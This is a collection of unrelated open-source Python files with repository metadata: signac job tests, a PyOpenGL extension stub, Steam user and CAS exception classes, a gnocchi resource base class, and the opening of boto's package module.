self.assertEqual(id(job), obj_id)
self.assertTrue(job.sp.a > 0)
self.assertEqual(job.get_id(), id0)
self.assertEqual(job.sp, sp0)
job2 = self.project.open_job(id=id0)
self.assertEqual(job.sp, job2.sp)
self.assertEqual(job.get_id(), job2.get_id())
class ConfigTest(BaseJobTest):
def test_set_get_delete(self):
key, value = 'author_name', list(test_token.values())[0]
config = copy.deepcopy(self.project.config)
config[key] = value
self.assertEqual(config[key], value)
self.assertIn(key, config)
del config[key]
self.assertNotIn(key, config)
def test_update(self):
key, value = 'author_name', list(test_token.values())[0]
config = copy.deepcopy(self.project.config)
config.update({key: value})
self.assertEqual(config[key], value)
self.assertIn(key, config)
def test_set_and_retrieve_version(self):
fake_version = 0, 0, 0
self.project.config['signac_version'] = fake_version
self.assertEqual(self.project.config['signac_version'], fake_version)
def test_str(self):
str(self.project.config)
class JobOpenAndClosingTest(BaseJobTest):
def test_init(self):
job = self.open_job(test_token)
self.assertFalse(os.path.isdir(job.workspace()))
job.init()
self.assertEqual(job.workspace(), job.ws)
self.assertTrue(os.path.isdir(job.workspace()))
self.assertTrue(os.path.isdir(job.ws))
self.assertTrue(os.path.exists(os.path.join(job.workspace(), job.FN_MANIFEST)))
def test_construction(self):
job = self.open_job(test_token)
job2 = eval(repr(job))
self.assertEqual(job, job2)
def test_open_job_close(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
with self.open_job(test_token) as job:
pass
job.remove()
def test_open_job_close_manual(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
job = self.open_job(test_token)
job.open()
job.close()
job.remove()
def test_open_job_close_with_error(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
job = self.open_job(test_token)
class TestError(Exception):
pass
with self.assertRaises(TestError):
with job:
raise TestError()
job.remove()
def test_reopen_job(self):
with warnings.catch_warnings():
warnings.simplefilter('ignore')
with self.open_job(test_token) as job:
job_id = job.get_id()
self.assertEqual(str(job_id), str(job))
with self.open_job(test_token) as job:
self.assertEqual(job.get_id(), job_id)
job.remove()
def test_close_nonopen_job(self):
job = self.open_job(test_token)
job.close()
with job:
pass
def test_close_job_while_open(self):
rp = os.path.realpath
cwd = rp(os.getcwd())
job = self.open_job(test_token)
with job:
job.close()
self.assertEqual(cwd, rp(os.getcwd()))
def test_open_job_recursive(self):
rp = os.path.realpath
cwd = rp(os.getcwd())
job = self.open_job(test_token)
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
os.chdir(self.project.root_directory())
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
os.chdir(self.project.root_directory())
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(rp(os.getcwd()), rp(self.project.root_directory()))
self.assertEqual(cwd, rp(os.getcwd()))
with job:
job.close()
self.assertEqual(cwd, rp(os.getcwd()))
with job:
self.assertEqual(rp(job.workspace()), rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
self.assertEqual(cwd, rp(os.getcwd()))
def test_corrupt_workspace(self):
job = self.open_job(test_token)
job.init()
fn_manifest = os.path.join(job.workspace(), job.FN_MANIFEST)
with open(fn_manifest, 'w') as file:
file.write("corrupted")
job2 = self.open_job(test_token)
try:
logging.disable(logging.ERROR)
with self.assertRaises(JobsCorruptedError):
job2.init()
finally:
logging.disable(logging.NOTSET)
job2.init(force=True)
job2.init()
class JobDocumentTest(BaseJobTest):
def test_get_set(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
self.assertFalse(bool(job.document))
self.assertEqual(len(job.document), 0)
self.assertNotIn(key, job.document)
job.document[key] = d
self.assertTrue(bool(job.document))
self.assertEqual(len(job.document), 1)
self.assertIn(key, job.document)
self.assertEqual(job.document[key], d)
self.assertEqual(job.document.get(key), d)
self.assertEqual(job.document.get('bs', d), d)
def test_del(self):
key = 'del0'
key1 = 'del1'
d = testdata()
d1 = testdata()
job = self.open_job(test_token)
self.assertEqual(len(job.document), 0)
self.assertNotIn(key, job.document)
job.document[key] = d
self.assertEqual(len(job.document), 1)
self.assertIn(key, job.document)
job.document[key1] = d1
self.assertEqual(len(job.document), 2)
self.assertIn(key, job.document)
self.assertIn(key1, job.document)
self.assertEqual(job.document[key], d)
self.assertEqual(job.document[key1], d1)
del job.document[key]
self.assertEqual(len(job.document), 1)
self.assertIn(key1, job.document)
self.assertNotIn(key, job.document)
def test_get_set_doc(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
self.assertFalse(bool(job.doc))
self.assertEqual(len(job.doc), 0)
self.assertNotIn(key, job.doc)
job.doc[key] = d
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 1)
self.assertIn(key, job.doc)
self.assertEqual(job.doc[key], d)
self.assertEqual(job.doc.get(key), d)
self.assertEqual(job.doc.get('bs', d), d)
def test_set_set_doc(self):
key0, key1 = 'set_set0', 'set_set1'
d0, d1 = testdata(), testdata()
job = self.open_job(test_token)
self.assertFalse(bool(job.doc))
self.assertEqual(len(job.doc), 0)
self.assertNotIn(key0, job.doc)
job.doc[key0] = d0
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 1)
self.assertIn(key0, job.doc)
self.assertEqual(job.doc[key0], d0)
job = self.open_job(test_token)
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 1)
self.assertIn(key0, job.doc)
self.assertEqual(job.doc[key0], d0)
job = self.open_job(test_token)
job.document[key1] = d1
self.assertTrue(bool(job.doc))
self.assertEqual(len(job.doc), 2)
self.assertIn(key0, job.doc)
self.assertIn(key1, job.doc)
self.assertEqual(job.doc[key0], d0)
self.assertEqual(job.doc[key1], d1)
def test_get_set_nested(self):
d0 = testdata()
d1 = testdata()
d2 = testdata()
assert d0 != d1 != d2
job = self.open_job(test_token)
self.assertEqual(len(job.document), 0)
self.assertNotIn('key0', job.document)
job.document['key0'] = d0
self.assertEqual(len(job.document), 1)
self.assertIn('key0', job.document)
self.assertEqual(job.document['key0'], d0)
with self.assertRaises(AttributeError):
job.document.key0.key1
job.document.key0 = {'key1': d0}
self.assertEqual(len(job.document), 1)
self.assertIn('key0', job.document)
self.assertEqual(job.document(), {'key0': {'key1': d0}})
self.assertEqual(job.document['key0'], {'key1': d0})
self.assertEqual(job.document['key0']['key1'], d0)
self.assertEqual(job.document.key0, {'key1': d0})
self.assertEqual(job.document.key0.key1, d0)
job.document.key0.key1 = d1
self.assertEqual(job.document, {'key0': {'key1': d1}})
self.assertEqual(job.document['key0'], {'key1': d1})
self.assertEqual(job.document['key0']['key1'], d1)
self.assertEqual(job.document.key0, {'key1': d1})
self.assertEqual(job.document.key0.key1, d1)
job.document['key0']['key1'] = d2
self.assertEqual(job.document, {'key0': {'key1': d2}})
self.assertEqual(job.document['key0'], {'key1': d2})
self.assertEqual(job.document['key0']['key1'], d2)
self.assertEqual(job.document.key0, {'key1': d2})
self.assertEqual(job.document.key0.key1, d2)
def test_get_set_nested_doc(self):
d0 = testdata()
d1 = testdata()
d2 = testdata()
assert d0 != d1 != d2
job = self.open_job(test_token)
self.assertEqual(len(job.doc), 0)
self.assertNotIn('key0', job.doc)
job.doc['key0'] = d0
self.assertEqual(len(job.doc), 1)
self.assertIn('key0', job.doc)
self.assertEqual(job.doc['key0'], d0)
with self.assertRaises(AttributeError):
job.doc.key0.key1
job.doc.key0 = {'key1': d0}
self.assertEqual(len(job.doc), 1)
self.assertIn('key0', job.doc)
self.assertEqual(job.doc(), {'key0': {'key1': d0}})
self.assertEqual(job.doc['key0'], {'key1': d0})
self.assertEqual(job.doc['key0']['key1'], d0)
self.assertEqual(job.doc.key0, {'key1': d0})
self.assertEqual(job.doc.key0.key1, d0)
job.doc.key0.key1 = d1
self.assertEqual(job.doc, {'key0': {'key1': d1}})
self.assertEqual(job.doc['key0'], {'key1': d1})
self.assertEqual(job.doc['key0']['key1'], d1)
self.assertEqual(job.doc.key0, {'key1': d1})
self.assertEqual(job.doc.key0.key1, d1)
job.doc['key0']['key1'] = d2
self.assertEqual(job.doc, {'key0': {'key1': d2}})
self.assertEqual(job.doc['key0'], {'key1': d2})
self.assertEqual(job.doc['key0']['key1'], d2)
self.assertEqual(job.doc.key0, {'key1': d2})
self.assertEqual(job.doc.key0.key1, d2)
def test_assign(self):
key = 'assign'
d0 = testdata()
d1 = testdata()
job = self.open_job(test_token)
self.assertEqual(len(job.document), 0)
job.document[key] = d0
self.assertEqual(len(job.document), 1)
self.assertEqual(job.document(), {key: d0})
with self.assertRaises(ValueError):
job.document = d1
job.document = {key: d1}
self.assertEqual(len(job.document), 1)
self.assertEqual(job.document(), {key: d1})
def test_assign_doc(self):
key = 'assign'
d0 = testdata()
d1 = testdata()
job = self.open_job(test_token)
self.assertEqual(len(job.doc), 0)
job.doc[key] = d0
self.assertEqual(len(job.doc), 1)
self.assertEqual(job.doc(), {key: d0})
with self.assertRaises(ValueError):
job.doc = d1
job.doc = {key: d1}
self.assertEqual(len(job.doc), 1)
self.assertEqual(job.doc(), {key: d1})
def test_copy_document(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
job.document[key] = d
self.assertTrue(bool(job.document))
self.assertEqual(len(job.document), 1)
self.assertIn(key, job.document)
self.assertEqual(job.document[key], d)
self.assertEqual(job.document.get(key), d)
self.assertEqual(job.document.get('bs', d), d)
copy = dict(job.document)
self.assertTrue(bool(copy))
self.assertEqual(len(copy), 1)
self.assertIn(key, copy)
self.assertEqual(copy[key], d)
self.assertEqual(copy.get(key), d)
self.assertEqual(copy.get('bs', d), d)
def test_update(self):
key = 'get_set'
d = testdata()
job = self.open_job(test_token)
job.document.update({key: d})
self.assertIn(key, job.document)
def test_clear_document(self):
key = 'clear'
d = testdata()
job = self.open_job(test_token)
job.document[key] = d
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
job.document.clear()
self.assertNotIn(key, job.document)
self.assertEqual(len(job.document), 0)
def test_reopen(self):
key = 'clear'
d = testdata()
job = self.open_job(test_token)
job.document[key] = d
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
job2 = self.open_job(test_token)
self.assertIn(key, job2.document)
self.assertEqual(len(job2.document), 1)
def test_concurrency(self):
key = 'concurrent'
d = testdata()
job = self.open_job(test_token)
job2 = self.open_job(test_token)
self.assertNotIn(key, job.document)
self.assertNotIn(key, job2.document)
job.document[key] = d
self.assertIn(key, job.document)
self.assertIn(key, job2.document)
def test_remove(self):
key = 'remove'
job = self.open_job(test_token)
job.remove()
d = testdata()
job.document[key] = d
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
fn_test = os.path.join(job.workspace(), 'test')
with open(fn_test, 'w') as file:
file.write('test')
self.assertTrue(os.path.isfile(fn_test))
job.remove()
self.assertNotIn(key, job.document)
self.assertFalse(os.path.isfile(fn_test))
def test_clear_job(self):
key = 'clear'
job = self.open_job(test_token)
self.assertNotIn(job, self.project)
job.clear()
self.assertNotIn(job, self.project)
job.clear()
self.assertNotIn(job, self.project)
job.init()
self.assertIn(job, self.project)
job.clear()
self.assertIn(job, self.project)
job.clear()
job.clear()
self.assertIn(job, self.project)
d = testdata()
job.document[key] = d
self.assertIn(job, self.project)
self.assertIn(key, job.document)
self.assertEqual(len(job.document), 1)
job.clear()
self.assertEqual(len(job.document), 0)
with open(job.fn('test'), 'w') as file:
file.write('test')
self.assertTrue(job.isfile('test'))
self.assertIn(job, self.project)
job.clear()
self.assertFalse(job.isfile('test'))
self.assertEqual(len(job.document), 0)
def test_reset(self):
key = 'reset'
job = self.open_job(test_token)
self.assertNotIn(job, self.project)
job.reset()
self.assertIn(job, self.project)
self.assertEqual(len(job.document), 0)
job.document[key] = testdata()
self.assertEqual(len(job.document), 1)
job.reset()
self.assertIn(job, self.project)
self.assertEqual(len(job.document), 0)
def test_doc(self):
key = 'test_doc'
job = self.open_job(test_token)
def check_content(key, d):
self.assertEqual(job.doc[key], d)
self.assertEqual(getattr(job.doc, key), d)
self.assertEqual(job.doc()[key], d)
self.assertEqual(job.document[key], d)
self.assertEqual(getattr(job.document, key), d)
self.assertEqual(job.document()[key], d)
d = testdata()
job.doc[key] = d
check_content(key, d)
d2 = testdata()
job.doc[key] = d2
check_content(key, d2)
d3 = testdata()
job.document[key] = d3
check_content(key, d3)
d4 = testdata()
setattr(job.doc, key, d4)
check_content(key, d4)
def test_sp_formatting(self):
job = self.open_job({'a': 0})
self.assertEqual('{job.statepoint.a}'.format(job=job), str(job.sp.a))
self.assertEqual('{job.sp.a}'.format(job=job), str(job.sp.a))
self.assertEqual('{job.statepoint[a]}'.format(job=job), str(job.sp.a))
self.assertEqual('{job.sp[a]}'.format(job=job), str(job.sp.a))
job.sp.a = dict(b=0)
self.assertEqual('{job.statepoint.a.b}'.format(job=job), str(job.sp.a.b))
self.assertEqual('{job.sp.a.b}'.format(job=job), str(job.sp.a.b))
self.assertEqual('{job.statepoint[a][b]}'.format(job=job), str(job.sp.a.b))
self.assertEqual('{job.sp[a][b]}'.format(job=job), str(job.sp.a.b))
def test_doc_formatting(self):
job = self.open_job(test_token)
job.doc.a = 0
self.assertEqual('{job.doc.a}'.format(job=job), str(job.doc.a))
self.assertEqual('{job.doc[a]}'.format(job=job), str(job.doc.a))
self.assertEqual('{job.document.a}'.format(job=job), str(job.doc.a))
self.assertEqual('{job.document[a]}'.format(job=job), str(job.doc.a))
job.doc.a = dict(b=0)
self.assertEqual('{job.doc.a.b}'.format(job=job), str(job.doc.a.b))
self.assertEqual('{job.doc.a.b}'.format(job=job), str(job.doc.a.b))
self.assertEqual('{job.document.a.b}'.format(job=job), str(job.doc.a.b))
self.assertEqual('{job.document[a][b]}'.format(job=job), str(job.doc.a.b))
def test_reset_statepoint_job(self):
key = 'move_job'
d = testdata()
src = test_token
dst = dict(test_token)
dst['dst'] = True
src_job = self.open_job(src)
src_job.document[key] = d
self.assertIn(key, src_job.document)
self.assertEqual(len(src_job.document), 1)
src_job.reset_statepoint(dst)
src_job = self.open_job(src)
dst_job = self.open_job(dst)
self.assertIn(key, dst_job.document)
self.assertEqual(len(dst_job.document), 1)
self.assertNotIn(key, src_job.document)
with self.assertRaises(RuntimeError):
src_job.reset_statepoint(dst)
with self.assertRaises(DestinationExistsError):
src_job.reset_statepoint(dst)
def test_reset_statepoint_project(self):
key = 'move_job'
d = testdata()
src = test_token
dst = dict(test_token)
dst['dst'] = True
src_job = self.open_job(src)
src_job.document[key] = d
self.assertIn(key, src_job.document)
self.assertEqual(len(src_job.document), 1)
self.project.reset_statepoint(src_job, dst)
src_job = self.open_job(src)
dst_job = self.open_job(dst)
self.assertIn(key, dst_job.document)
self.assertEqual(len(dst_job.document), 1)
self.assertNotIn(key, src_job.document)
with self.assertRaises(RuntimeError):
self.project.reset_statepoint(src_job, dst)
with self.assertRaises(DestinationExistsError):
self.project.reset_statepoint(src_job, dst)
def test_update_statepoint(self):
key = 'move_job'
d = testdata()
src = test_token
extension = {'dst': True}
dst = dict(src)
dst.update(extension)
extension2 = {'dst': False}
dst2 = dict(src)
dst2.update(extension2)
src_job = self.open_job(src)
src_job.document[key] = d
self.assertIn(key, src_job.document)
self.assertEqual(len(src_job.document), 1)
self.project.update_statepoint(src_job, extension)
src_job = self.open_job(src)
dst_job = self.open_job(dst)
self.assertEqual(dst_job.statepoint(), dst)
self.assertIn(key, dst_job.document)
self.assertEqual(len(dst_job.document), 1)
self.assertNotIn(key, src_job.document)
with self.assertRaises(RuntimeError):
self.project.reset_statepoint(src_job, dst)
with self.assertRaises(DestinationExistsError):
self.project.reset_statepoint(src_job, dst)
with self.assertRaises(KeyError):
self.project.update_statepoint(dst_job, extension2)
self.project.update_statepoint(dst_job, extension2, overwrite=True)
dst2_job = self.open_job(dst2)
self.assertEqual(dst2_job.statepoint(), dst2)
self.assertIn(key, dst2_job.document)
self.assertEqual(len(dst2_job.document), 1)
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "549c85e3e6e1842a0a12f9704c2584dd",
"timestamp": "",
"source": "github",
"line_count": 873,
"max_line_length": 87,
"avg_line_length": 35.67124856815578,
"alnum_prop": 0.5757682797598022,
"repo_name": "csadorf/signac",
"id": "c5c7d766e62a8dd9d5e3185d83409fc0f10bfbcc",
"size": "31287",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_job.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "673188"
},
{
"name": "Shell",
"bytes": "6879"
},
{
"name": "TeX",
"bytes": "938"
}
],
"symlink_target": ""
} |
'''OpenGL extension SGIX.shadow_ambient
Automatically generated by the get_gl_extensions script, do not edit!
'''
from OpenGL import platform, constants, constant, arrays
from OpenGL import extensions
from OpenGL.GL import glget
import ctypes
EXTENSION_NAME = 'GL_SGIX_shadow_ambient'
_DEPRECATED = False
GL_SHADOW_AMBIENT_SGIX = constant.Constant( 'GL_SHADOW_AMBIENT_SGIX', 0x80BF )
def glInitShadowAmbientSGIX():
'''Return boolean indicating whether this extension is available'''
return extensions.hasGLExtension( EXTENSION_NAME )
| {
"content_hash": "0ac225855d9532cea2a33de5c24aaebf",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 34.0625,
"alnum_prop": 0.7834862385321101,
"repo_name": "Universal-Model-Converter/UMC3.0a",
"id": "a2d8083e9a60cd128404da5d896051aef8cef837",
"size": "545",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "data/Python/x86/Lib/site-packages/OpenGL/raw/GL/SGIX/shadow_ambient.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "226"
},
{
"name": "C",
"bytes": "1082640"
},
{
"name": "C#",
"bytes": "8440"
},
{
"name": "C++",
"bytes": "3621086"
},
{
"name": "CSS",
"bytes": "6226"
},
{
"name": "F#",
"bytes": "2310"
},
{
"name": "FORTRAN",
"bytes": "7795"
},
{
"name": "Forth",
"bytes": "506"
},
{
"name": "GLSL",
"bytes": "1040"
},
{
"name": "Groff",
"bytes": "5943"
},
{
"name": "HTML",
"bytes": "1196266"
},
{
"name": "Java",
"bytes": "5793"
},
{
"name": "Makefile",
"bytes": "1109"
},
{
"name": "Mask",
"bytes": "969"
},
{
"name": "Matlab",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "33351557"
},
{
"name": "R",
"bytes": "1370"
},
{
"name": "Shell",
"bytes": "6931"
},
{
"name": "Tcl",
"bytes": "2084458"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
} |
from .main import sg_hybrid_decrypt, sg_hybrid_encrypt, sg_hybrid_encrypt_with_auditlog
from .secondguard import RateLimitError, BadRequestError
| {
"content_hash": "b1417bf687bd94a88d788033ce7b7d8b",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 87,
"avg_line_length": 48.666666666666664,
"alnum_prop": 0.8287671232876712,
"repo_name": "secondguard/secondguard-python",
"id": "bf41356257a99de0ef5e645a52a5a4ba77bfcf73",
"size": "146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "secondguard/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19330"
}
],
"symlink_target": ""
} |
from datetime import datetime
from binascii import hexlify
from gevent.event import Event
from steam.steamid import SteamID
from steam.enums import EFriendRelationship, EPersonaState, EChatEntryType
from steam.enums.emsg import EMsg
from steam.core.msg import MsgProto
class SteamUser(object):
"""
A data model for a Steam user. Holds user persona state, and related actions
.. note::
This is an internal object that can be obtained by :meth:`SteamClient.get_user`
"""
_pstate = None
_pstate_requested = False
steam_id = SteamID() #: steam id
relationship = EFriendRelationship.NONE #: friendship status
def __init__(self, steam_id, steam):
self._pstate_ready = Event()
self._steam = steam
self.steam_id = SteamID(steam_id)
def __repr__(self):
return "<%s(%s, %s, %s)>" % (
self.__class__.__name__,
str(self.steam_id),
self.relationship,
self.state,
)
def refresh(self, wait=True):
if self._pstate_requested and self._pstate_ready.is_set():
self._pstate_requested = False
if not self._pstate_requested:
self._steam.request_persona_state([self.steam_id])
self._pstate_ready.clear()
self._pstate_requested = True
if wait:
self._pstate_ready.wait(timeout=5)
self._pstate_requested = False
def get_ps(self, field_name, wait_pstate=True):
"""Get property from PersonaState
`See full list of available fields_names <https://github.com/ValvePython/steam/blob/fa8a5127e9bb23185483930da0b6ae85e93055a7/protobufs/steammessages_clientserver_friends.proto#L125-L153>`_
"""
if not self._pstate_ready.is_set() and wait_pstate:
self.refresh()
if self._pstate is not None:
return getattr(self._pstate, field_name)
else:
return None
@property
def last_logon(self):
""":rtype: :class:`datetime`, :class:`None`"""
ts = self.get_ps('last_logon')
return datetime.utcfromtimestamp(ts) if ts else None
@property
def last_logoff(self):
""":rtype: :class:`datetime`, :class:`None`"""
ts = self.get_ps('last_logoff')
return datetime.utcfromtimestamp(ts) if ts else None
@property
def name(self):
"""Name of the steam user, or ``None`` if it's not available
:rtype: :class:`str`, :class:`None`
"""
return self.get_ps('player_name')
@property
def state(self):
"""Personsa state (e.g. Online, Offline, Away, Busy, etc)
:rtype: :class:`.EPersonaState`
"""
state = self.get_ps('persona_state', False)
return EPersonaState(state) if state else EPersonaState.Offline
@property
def rich_presence(self):
"""Contains Rich Presence key-values
:rtype: dict
"""
kvs = self.get_ps('rich_presence')
data = {}
if kvs:
for kv in kvs:
data[kv.key] = kv.value
return data
def get_avatar_url(self, size=2):
"""Get URL to avatar picture
:param size: possible values are ``0``, ``1``, or ``2`` corresponding to small, medium, large
:type size: :class:`int`
:return: url to avatar
:rtype: :class:`str`
"""
hashbytes = self.get_ps('avatar_hash')
        if hashbytes != b"\000" * 20:
ahash = hexlify(hashbytes).decode('ascii')
else:
ahash = 'fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb'
sizes = {
0: '',
1: '_medium',
2: '_full',
}
url = "http://cdn.akamai.steamstatic.com/steamcommunity/public/images/avatars/%s/%s%s.jpg"
return url % (ahash[:2], ahash, sizes[size])
def send_message(self, message):
"""Send chat message to this steam user
:param message: message to send
:type message: str
"""
# new chat
if self._steam.chat_mode == 2:
self._steam.send_um("FriendMessages.SendMessage#1", {
'steamid': self.steam_id,
'message': message,
'chat_entry_type': EChatEntryType.ChatMsg,
})
# old chat
else:
self._steam.send(MsgProto(EMsg.ClientFriendMsg), {
'steamid': self.steam_id,
'chat_entry_type': EChatEntryType.ChatMsg,
'message': message.encode('utf8'),
})
def block(self):
"""Block user"""
self._steam.friends.block(self)
def unblock(self):
"""Unblock user"""
self._steam.friends.unblock(self)
| {
"content_hash": "a2ffd4cd3a6c5c5f9a7c659d8bfc1418",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 196,
"avg_line_length": 31.212903225806453,
"alnum_prop": 0.5725506407606449,
"repo_name": "ValvePython/steam",
"id": "1eebeeac3cd1209257ba440f776ecc39678ba0cb",
"size": "4838",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "steam/client/user.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2566"
},
{
"name": "Python",
"bytes": "470889"
}
],
"symlink_target": ""
} |
"""
(2.5.3, 2.7.3) Exceptions for ticket validation failure responses
with the set of error codes that all CAS servers must implement.
"""
class ValidationError(Exception):
"""Base exception class for ticket validation failures."""
class InvalidRequest(ValidationError):
"""Not all of the required request parameters were present."""
code = 'INVALID_REQUEST'
class InvalidTicketSpec(ValidationError):
"""Failure to meet the requirements of validation specification."""
code = 'INVALID_TICKET_SPEC'
class UnauthorizedServiceProxy(ValidationError):
"""The service is not authorized to perform proxy authentication."""
code = 'UNAUTHORIZED_SERVICE_PROXY'
class InvalidProxyCallback(ValidationError):
"""The proxy callback specified is invalid."""
code = 'INVALID_PROXY_CALLBACK'
class InvalidTicket(ValidationError):
"""
The ticket provided was not valid, or the ticket did not come
from an initial login and renew was set on validation.
"""
code = 'INVALID_TICKET'
class InvalidService(ValidationError):
"""
The service specified did not match the service identifier
associated with the ticket.
"""
code = 'INVALID_SERVICE'
class InternalError(ValidationError):
"""An internal error occurred during ticket validation."""
code = 'INTERNAL_ERROR'
class UnauthorizedService(ValidationError):
"""Service is unauthorized to perform the proxy request."""
code = 'UNAUTHORIZED_SERVICE'
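# Illustrative handling (hypothetical names, not part of this module): a
# validation view would catch ValidationError and report the per-class code:
#   try:
#       validate_ticket(ticket, service)   # hypothetical validation call
#   except ValidationError as e:
#       return failure_response(code=e.code, message=str(e))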
| {
"content_hash": "c43da06e59c68ea48e91ec786927e28d",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 72,
"avg_line_length": 27.537037037037038,
"alnum_prop": 0.7262945527908541,
"repo_name": "orbitvu/django-mama-cas",
"id": "dd1c707820a2d7671a398736f211bdc446f061dc",
"size": "1487",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mama_cas/exceptions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3971"
},
{
"name": "Python",
"bytes": "164680"
}
],
"symlink_target": ""
} |
import abc
import six
@six.add_metaclass(abc.ABCMeta)
class ResourceBase(object):
"""Base class for resource."""
@abc.abstractmethod
def get_resource_extra_attributes(self, sample):
"""Extract the metadata from a ceilometer sample.
:param sample: The ceilometer sample
:returns: the resource attributes
"""
@abc.abstractmethod
def get_metrics_names(self):
"""Return the metric handled by this resource.
:returns: list of metric names
"""
| {
"content_hash": "51b9977db2d88497f144c036f8a36b58",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 57,
"avg_line_length": 22.652173913043477,
"alnum_prop": 0.6487523992322457,
"repo_name": "idegtiarov/gnocchi-rep",
"id": "37d1ed70d82235f7c1a49ddea68852e9fd2fb9d0",
"size": "1155",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "gnocchi/ceilometer/resources/base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "706"
},
{
"name": "Mako",
"bytes": "1124"
},
{
"name": "Python",
"bytes": "445026"
},
{
"name": "Shell",
"bytes": "19534"
}
],
"symlink_target": ""
} |
from boto.pyami.config import Config, BotoConfigLocations
from boto.storage_uri import BucketStorageUri, FileStorageUri
import boto.plugin
import datetime
import os
import platform
import re
import sys
import logging
import logging.config
import urlparse
from boto.exception import InvalidUriError
__version__ = '2.25.0'
Version = __version__ # for backward compatibility
# http://bugs.python.org/issue7980
datetime.datetime.strptime('', '')
UserAgent = 'Boto/%s Python/%s %s/%s' % (
__version__,
platform.python_version(),
platform.system(),
platform.release()
)
config = Config()
# Regex to disallow buckets violating charset or not [3..255] chars total.
BUCKET_NAME_RE = re.compile(r'^[a-zA-Z0-9][a-zA-Z0-9\._-]{1,253}[a-zA-Z0-9]$')
# Regex to disallow buckets with individual DNS labels longer than 63.
TOO_LONG_DNS_NAME_COMP = re.compile(r'[-_a-z0-9]{64}')
GENERATION_RE = re.compile(r'(?P<versionless_uri_str>.+)'
r'#(?P<generation>[0-9]+)$')
VERSION_RE = re.compile('(?P<versionless_uri_str>.+)#(?P<version_id>.+)$')
ENDPOINTS_PATH = os.path.join(os.path.dirname(__file__), 'endpoints.json')
def init_logging():
for file in BotoConfigLocations:
try:
logging.config.fileConfig(os.path.expanduser(file))
except:
pass
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('boto')
perflog = logging.getLogger('boto.perf')
log.addHandler(NullHandler())
perflog.addHandler(NullHandler())
init_logging()
# convenience function to set logging to a particular file
def set_file_logger(name, filepath, level=logging.INFO, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.FileHandler(filepath)
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
def set_stream_logger(name, level=logging.DEBUG, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.StreamHandler()
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
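# Illustrative usage (not part of the original module): wire-level debug
# logging can be enabled with, e.g.
#   import boto
#   boto.set_stream_logger('boto')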
def connect_sqs(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sqs.connection.SQSConnection`
:return: A connection to Amazon's SQS
"""
from boto.sqs.connection import SQSConnection
return SQSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_s3(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Amazon's S3
"""
from boto.s3.connection import S3Connection
return S3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
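# Illustrative usage (placeholder credentials): the connect_* helpers below
# all follow the same pattern, e.g.
#   conn = boto.connect_s3('<aws access key id>', '<aws secret access key>')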
def connect_gs(gs_access_key_id=None, gs_secret_access_key=None, **kwargs):
"""
